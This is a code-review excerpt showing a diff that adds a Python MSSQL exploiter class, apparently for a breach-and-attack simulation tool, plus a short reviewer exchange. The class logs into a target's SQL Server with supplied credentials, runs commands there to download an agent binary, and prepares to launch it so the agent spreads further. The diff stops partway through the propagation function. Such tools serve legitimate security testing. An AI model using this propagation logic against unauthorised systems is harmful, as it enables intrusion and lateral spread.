monkey/agent_plugins/exploiters/mssql/src/mssql_exploit_client.py

```diff
@@ -0,0 +1,151 @@
+class MSSQLExploitClient:
+    def __init__(
+        self,
+        exploiter_name: str,
+        agent_id: AgentID,
+        agent_event_publisher: IAgentEventPublisher,
+        mssql_client: MSSQLClient,
+    ):
+        self._exploiter_name = exploiter_name
+        self._agent_id = agent_id
+        self._agent_event_publisher = agent_event_publisher
+        self._client = mssql_client
+
+    def exploit_host(
+        self,
+        host: TargetHost,
+        options: MSSQLOptions,
+        credentials: Credentials,
+        download_agent_command: str,
+        launch_agent_command: str,
+        agent_binary_downloaded: Event,
+        interrupt: Event,
+    ) -> Tuple[bool, bool]:
+        """
+        Exploit the host over MSSQL using the given credentials.
+
+        :param host: The host to exploit
+        :param credentials: The credentials to use
+        :param download_agent_command: The command to download the agent binary
+        :param launch_agent_command: The command to launch the agent binary
+        :param agent_binary_downloaded: An event that will be set when the agent binary
+            is downloaded
+        :param interrupt: An event that will be set if the exploit should be interrupted
+        :return: A tuple of (exploitation_success, propagation_success)
+        """
+        exploitation_message = ""
+        exploitation_success = True
+
+        # TODO: Try all configured ports?
+        # TODO: Roll download & run into a single command?
+        timestamp = time()
+        try:
+            self._client.login(host.ip, 1433, credentials)
+        except Exception as err:
+            exploitation_message = f"Failed to login to MSSQL server on {host.ip}: {err}"
+            exploitation_success = False
+            pass
+
+        # Propagate
+        propagation_success, propagation_message = self._propagate(
+            download_agent_command,
+            launch_agent_command,
+            exploitation_success,
+            agent_binary_downloaded,
+            options.agent_binary_download_timeout,
+        )
+
+        self._publish_exploitation_event(
+            host, timestamp, exploitation_success, exploitation_message
+        )
+        self._publish_propagation_event(host, timestamp, propagation_success, propagation_message)
+
+        return exploitation_success, propagation_success
+
+    def _propagate(
+        self,
+        download_agent_command: str,
+        launch_agent_command: str,
+        exploitation_success: bool,
+        agent_binary_downloaded: Event,
+        agent_binary_download_timeout: float,
+    ) -> Tuple[bool, str]:
+        if not exploitation_success:
+            return False, ""
+
+        try:
+            self._client.run_command(download_agent_command)
+
+            logger.debug("Waiting for the target to download the agent binary...")
+            agent_binary_downloaded.wait(agent_binary_download_timeout)
+            if agent_binary_downloaded.is_set():
```

Comment:
Where is this being set?

Reply:
This comes from the HTTP server. More precisely `agent_binary_http_serveri.bytes_downloaded`. `is_set` tells us whether the agent binary was fully downloaded.